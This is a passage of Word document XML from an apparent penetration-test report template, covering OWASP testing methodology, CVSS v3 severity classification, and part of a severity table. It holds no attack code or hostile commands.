    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000170" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645207" w:id="38"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Pentest</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> - OWASP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000171" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="5A74C9BE">
        <w:rPr/>
        <w:t xml:space="preserve">{name} uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>OWASP Web Security Testing Guide (WSTG)</w:t>
      </w:r>
      <w:r w:rsidRPr="5A74C9BE">
        <w:rPr/>
        <w:t xml:space="preserve"> as a guideline for testing security controls in {company.name} web applications outlined in our scope. The WSTG is developed collaboratively by the OWASP community, allowing for continuous improvement and updates based on evolving security challenges. Furthermore, the guide includes practical scenarios, examples, and techniques to simulate real-world attack scenarios and help testers understand how vulnerabilities may be exploited. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000172" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000173" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve"> is also considered when assessing web applications. This list is regularly updated and </w:t>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve">contains</w:t>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve"> the ten most critical web application security risks. Published by the Open Web Application Security Project (OWASP), this list aims to raise awareness about common vulnerabilities that can be exploited by attackers and to guide organizations in prioritizing their efforts to secure web applications. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000174" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000175" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0705EC50" wp14:editId="07777777">
            <wp:extent cx="3959211" cy="3892105"/>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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3959211" cy="3892105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000176" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:footnoteReference w:id="2"/>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t>OWASP Chart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000177" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000178" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645208" w:id="39"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>- CVSS v3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000179" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t>{name} uses the Common Vulnerability Scoring System (CVSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteReference w:id="3"/>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve"> during the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000017A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">engagement to classify the severity level of each vulnerability. The CVSS is a common, industry standard scale that calculates the severity of a vulnerability based on </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>various factors</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> such as</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000017B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">attack complexity, impact, and scope. More specifically, CVSS v3 is </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>, a standard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000017C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>that was implemented in 2019 and better evaluates factors better than its predecessors such as feasibility of attack and scope. The score ranges from 5 broad classifications (Critical, High,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000017D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Medium, Low, and Informational) based on the mentioned factors and provides a quantitative description of a vulnerability’s impact with a number ranging (0.0-10.0). </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>In order to</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> rate the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000017E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">system, previously assigned CVSS scores given to exploited CVEs or an industry standard calculator was </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="0000017F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.xmnv2xsq404l" w:colFirst="0" w:colLast="0" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t>CVSS Chart</w:t>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteReference w:id="4"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9536" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="8" w:space="0"/>
          <w:insideH w:val="single" w:color="000000" w:themeColor="text1" w:sz="8" w:space="0"/>
          <w:insideV w:val="single" w:color="000000" w:themeColor="text1" w:sz="8" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2175"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="5516"/>
      </w:tblGrid>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="626CD5C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000180" w14:textId="77777777">
            <w:pPr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000181" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CVSS V3 Score Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5516" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000182" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="04520412" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="85200C"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000183" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000184" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>9.0-10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5516" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000185" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Exploitation is straightforward and usually results in system-level compromise. It is </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>advised to form</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> a plan of action and patch </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>immediately</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="5972D2AC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CC4125"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000186" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000187" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>7.0-8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5516" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000188" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Exploitation is more difficult but could cause elevated privileges and potentially a loss of data or downtime. It is </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>advised to form</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> a plan of action and patch as soon as possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="2508E9CD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1C232"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000189" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000018A" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>4.0-6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5516" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000018B" w14:textId="77777777">
            <w:pPr>
